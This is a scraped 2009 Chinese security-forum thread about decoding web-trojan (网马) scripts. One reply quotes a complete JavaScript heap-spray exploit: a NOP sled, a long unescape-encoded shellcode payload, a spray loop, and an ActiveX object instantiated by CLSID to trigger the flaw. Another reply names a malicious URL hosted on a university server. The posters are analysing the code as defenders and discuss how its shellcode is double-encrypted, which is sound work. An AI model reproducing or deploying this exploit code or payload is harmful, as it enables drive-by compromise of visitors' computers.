瑞星卡卡安全论坛技术交流区恶意网站交流 向大家推荐一个解密网马工具,并想“networkedition ”请教个问题。

1   1  /  1  页   跳转

[讨论] 向大家推荐一个解密网马工具,并想“networkedition ”请教个问题。

向大家推荐一个解密网马工具,并想“networkedition ”请教个问题。

该用户帖子内容已被屏蔽

附件附件:

文件名:3.jpg
下载次数:400
文件类型:image/pjpeg
文件大小:
上传时间:2009-9-25 18:31:27
描述:jpg


分享到:
gototop
 

回复: 向大家推荐一个解密网马工具,并想“networkedition ”请教个问题。

该用户帖子内容已被屏蔽

gototop
 

回复:向大家推荐一个解密网马工具,并想“networkedition ”请教个问题。

dns failed了  http://  yjsgl.bjut.edu.cn/bgdadmin/image/go2.jpg提供下源码
gototop
 

回复: 向大家推荐一个解密网马工具,并想“networkedition ”请教个问题。



引用:
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%uc929%u5db1%ua0bf%uac39%uda30%ud9dd%u2474%u5ef4%u7e31%u8311%ufcee%u7e03%ue20d%ud255%u6abc%u16df%uec74%u6466%u7187%u9fac%u931e%u7436%ubc25%u742d%uc3d9%uc7c1%ua5bf%u1bb8%ued42%u0213%u9724%uec71%ubac2%u8b9c%ua8d9%u0587%u8c33%ucc25%u1c91%u97a4%uba3b%u8a5c%u025c%uc83a%ua2b0%ua7b7%u83c1%u7f09%uba3b%ue20f%ua92e%u74dc%u478e%u961d%u589e%u72a7%uc5ff%uf8fb%u358f%u38c5%ue27d%u19db%u903f%ued81%u3f38%u446d%uc0e8%u099f%ue01b%ub31a%u4646%u5f5c%u2eec%uc68e%u958b%u9bbc%u47b9%u04da%u8529%u4993%u6ac8%u6752%uf36a%u6d0d%u90d2%u5de6%u568a%ua29d%u2641%ubdae%ud9a6%u27f4%u83bf%u08ee%u7c4a%uaed1%u9aed%ub301%u33e8%uf3c0%u3911%ue94b%u3260%uc412%u7a0d%u8711%u184c%ucf1c%ue1d8%uedc0%u87bd%uf11d%u2e5b%u5377%u9895%uab4d%u7dec%u519f%uc4fd%u50d6%u0967%uad81%u5b0e%u843c%u5696%u81a2%uf9c4%ufa12%u30da%ub6c4%u0427%u323a%u2fdf%u9e63%u8f6e%u78f5%u31f7%u6905%u263e%u8803%u4419%u8616%u5d66%uc002%u5e49%u393f%u7595%u4252%u57a2%u505c%u92b7%u5171%u83a3%u0751%ub4fa%ue496%uc9e2%u8ca2%ud039%u42a2%ue20c%u61a9%uf877%u4fb4%ufb7e%uba3b%u078f%ubd28%u189b%ua776%u32b0%u2c73%u32be%u01e2%u68f4%u6cc9%u64e5%u6604%u7702%u712b%u782c%u8246%ue00b%u0fc0%u63d8%udf2a%ub10f%u3172%u8961%u63b0%udeb4%u4f9a%u178c%u98d5%u78c8%u837c%ua95d%u331b%u35fb");
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
ide='clsi'+'d:0'+'955AC6'+'2-B'+'F2E-4C'+'BA-A2B'+'9-A63F'+'772D46'+'CF';
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo0.gif';
myObject.classid=ide;

其中%uc929%u5db1%ua0bf%uac39%uda30%ud9dd%u2474%u5ef4%u7e31%u8311%ufcee%u7e03%ue20d%ud255%u6abc%u16df%uec74%u6466%u7187%u9fac%u931e%u7436%ubc25%u742d%uc3d9%uc7c1%ua5bf%u1bb8%ued42%u0213%u9724%uec71%ubac2%u8b9c%ua8d9%u0587%u8c33%ucc25%u1c91%u97a4%uba3b%u8a5c%u025c%uc83a%ua2b0%ua7b7%u83c1%u7f09%uba3b%ue20f%ua92e%u74dc%u478e%u961d%u589e%u72a7%uc5ff%uf8fb%u358f%u38c5%ue27d%u19db%u903f%ued81%u3f38%u446d%uc0e8%u099f%ue01b%ub31a%u4646%u5f5c%u2eec%uc68e%u958b%u9bbc%u47b9%u04da%u8529%u4993%u6ac8%u6752%uf36a%u6d0d%u90d2%u5de6%u568a%ua29d%u2641%ubdae%ud9a6%u27f4%u83bf%u08ee%u7c4a%uaed1%u9aed%ub301%u33e8%uf3c0%u3911%ue94b%u3260%uc412%u7a0d%u8711%u184c%ucf1c%ue1d8%uedc0%u87bd%uf11d%u2e5b%u5377%u9895%uab4d%u7dec%u519f%uc4fd%u50d6%u0967%uad81%u5b0e%u843c%u5696%u81a2%uf9c4%ufa12%u30da%ub6c4%u0427%u323a%u2fdf%u9e63%u8f6e%u78f5%u31f7%u6905%u263e%u8803%u4419%u8616%u5d66%uc002%u5e49%u393f%u7595%u4252%u57a2%u505c%u92b7%u5171%u83a3%u0751%ub4fa%ue496%uc9e2%u8ca2%ud039%u42a2%ue20c%u61a9%uf877%u4fb4%ufb7e%uba3b%u078f%ubd28%u189b%ua776%u32b0%u2c73%u32be%u01e2%u68f4%u6cc9%u64e5%u6604%u7702%u712b%u782c%u8246%ue00b%u0fc0%u63d8%udf2a%ub10f%u3172%u8961%u63b0%udeb4%u4f9a%u178c%u98d5%u78c8%u837c%ua95d%u331b%u35fb

这部分不是简单简单xor加密的 他是两层加密的 一般工具是解不出来的  高人指导说 需要od调试才可以的
gototop
 

回复: 向大家推荐一个解密网马工具,并想“networkedition ”请教个问题。

直接工具下。。
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT